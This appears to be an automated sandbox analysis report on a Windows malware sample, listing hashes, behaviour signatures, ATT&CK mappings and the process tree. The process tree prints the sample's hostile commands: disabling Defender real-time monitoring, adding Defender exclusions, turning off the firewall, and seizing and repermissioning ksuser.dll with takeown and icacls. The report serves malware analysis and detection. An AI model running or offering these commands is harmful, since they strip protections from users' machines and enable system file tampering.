Analysis
- max time kernel: 141s
- max time network: 120s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 05-11-2024 07:32
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe
Resource
win10v2004-20241007-en
General
- Target: SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe
- Size: 125KB
- MD5: a293e528bd51b9d91da21e8cbfa8e5f5
- SHA1: c82ecf0733270f0807cb86bad5e1c0126284fd62
- SHA256: 4fdf991291c527bf79c6b7a489c80d6843a3a36aea0d4ce7e2f027a9b2fedcd5
- SHA512: 9223707eff3ac89eef7aed38d761926d4d17fafb1ff302ee35e5940fe30a3a7f478d5d59bb3c4864f4c25f2b34af2e769cea298826fdfe65f0c62009e879c020
- SSDEEP: 3072:6KnT6V9P0IbarstiLniYqANZcfBuydIvRuX1FH4zUFluD:6m6VunedBuydVFH4zUF
Malware Config
Signatures
-
Processes:
- PID 1592: powershell.exe
- PID 2668: powershell.exe
- PID 1620: powershell.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
- PID 2632: netsh.exe
Possible privilege escalation attempt 14 IoCs
Processes:
- PID 2728: icacls.exe
- PID 2044: icacls.exe
- PID 2720: icacls.exe
- PID 2708: takeown.exe
- PID 2820: takeown.exe
- PID 2516: icacls.exe
- PID 2584: icacls.exe
- PID 840: icacls.exe
- PID 672: icacls.exe
- PID 1632: icacls.exe
- PID 2560: icacls.exe
- PID 2576: icacls.exe
- PID 1932: icacls.exe
- PID 2260: icacls.exe
Modifies file permissions 1 TTPs 14 IoCs
Processes:
- PID 2584: icacls.exe
- PID 2044: icacls.exe
- PID 2708: takeown.exe
- PID 672: icacls.exe
- PID 2728: icacls.exe
- PID 840: icacls.exe
- PID 2720: icacls.exe
- PID 2260: icacls.exe
- PID 1632: icacls.exe
- PID 2820: takeown.exe
- PID 2560: icacls.exe
- PID 2576: icacls.exe
- PID 2516: icacls.exe
- PID 1932: icacls.exe
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
- File created: C:\Windows\SysWOW64\ksuser.dll (process: SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe)
- File opened for modification: C:\Windows\SysWOW64\ksuser.dll (process: SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe)
Drops file in Windows directory 1 IoCs
Processes:
- File opened for modification: C:\Windows\Logs\DISM\dism.log (process: Dism.exe)
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
- Key opened: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh (process: netsh.exe)
- Key queried: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh (process: netsh.exe)
- Key value enumerated: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh (process: netsh.exe)
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
- PID 1592: powershell.exe
- PID 1620: powershell.exe
- PID 2668: powershell.exe
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
- Token: SeDebugPrivilege (PID 1592, powershell.exe)
- Token: SeDebugPrivilege (PID 1620, powershell.exe)
- Token: SeDebugPrivilege (PID 2668, powershell.exe)
- Token: SeTakeOwnershipPrivilege (PID 2820, takeown.exe)
- Token: SeTakeOwnershipPrivilege (PID 2708, takeown.exe)
- Token: SeRestorePrivilege (PID 2584, icacls.exe)
- Token: SeRestorePrivilege (PID 2720, icacls.exe)
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.MalwareX-gen.384.4440.exe"
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2324

    C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 1628

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1592

    C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 1000

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Windows\SysWOW64\uavh.dll'"
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1620

    C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 2616

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"
        - Command and Scripting Interpreter: PowerShell
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2668

    C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 2316

        C:\Windows\SysWOW64\netsh.exe
        Command line: netsh advfirewall set allprofiles state off
        - Modifies Windows Firewall
        - Event Triggered Execution: Netsh Helper DLL
        - System Location Discovery: System Language Discovery
        PID: 2632

    C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c dism /Online /enable-feature /FeatureName:"DirectPlay" /All
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 2628

        C:\Windows\SysWOW64\Dism.exe
        Command line: dism /Online /enable-feature /FeatureName:"DirectPlay" /All
        - Drops file in Windows directory
        - System Location Discovery: System Language Discovery
        PID: 2656

    C:\Windows\SysWOW64\takeown.exe
    Command line: takeown /f "C:\Windows\system32\ksuser.dll" /A
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID: 2820

    C:\Windows\SysWOW64\takeown.exe
    Command line: takeown /f "C:\Windows\system32\ksuser.dll"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID: 2708

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser.dll /grant Administrators:(F,DE)
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID: 2560

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser.dll /grant "Admin":(F,DE)
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID: 2576

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser.dll /inheritance:d
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID: 2516

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser.dll /setowner "NT SERVICE\TrustedInstaller
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID: 2584

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser.dll /grant:r "NT SERVICE\TrustedInstaller":F
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID: 2044

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser.dll /grant:r "Administrators":RX
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID: 1932

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser.dll /grant:r "Admin":RX
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID: 840

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser64.dll /inheritance:d
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID: 672

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser64.dll /setowner "NT SERVICE\TrustedInstaller
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID: 2720

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser64.dll /grant:r "NT SERVICE\TrustedInstaller":F
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID: 2728

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser64.dll /grant:r "Administrators":RX
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID: 2260

    C:\Windows\SysWOW64\icacls.exe
    Command line: icacls C:\Windows\system32\ksuser64.dll /grant:r "Admin":RX
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID: 1632
Network
MITRE ATT&CK Enterprise v15
Persistence
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Privilege Escalation
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB
MD5: 6617a2f11084bb9893c3ab1b4bd073eb
SHA1: 0090c4dade877b98a5df88389d7132e420155594
SHA256: b6a591da0da6d461559d478e474ea6b4884e97eb4bf5b1db59718c052527ce5d
SHA512: c96e5dcce3b8897d7102d86e274d30b4982fd2cb3fdfb0d13a4e8664ac7ebe82dccae37b7996376a3f19f5f6d10cc66957f0258d178526620e459f29dca6490e
-
Filesize: 118KB
MD5: d5f3ecad923278e96bbbb6796f0bbca5
SHA1: 9c54ba7de2d02306e3fcfa949163f10086c3ca3b
SHA256: 447ae50e3e916b31ca861c97e9aab69301cec7ac9f1e527c07048ea7cba81807
SHA512: 9c27b05c497ba2662b93092d848c02ae3cadc8096618df488371be03859dc701e3d167745507b23a017c4d35b96cf285642af75f13ee749bafa891d25c671e5a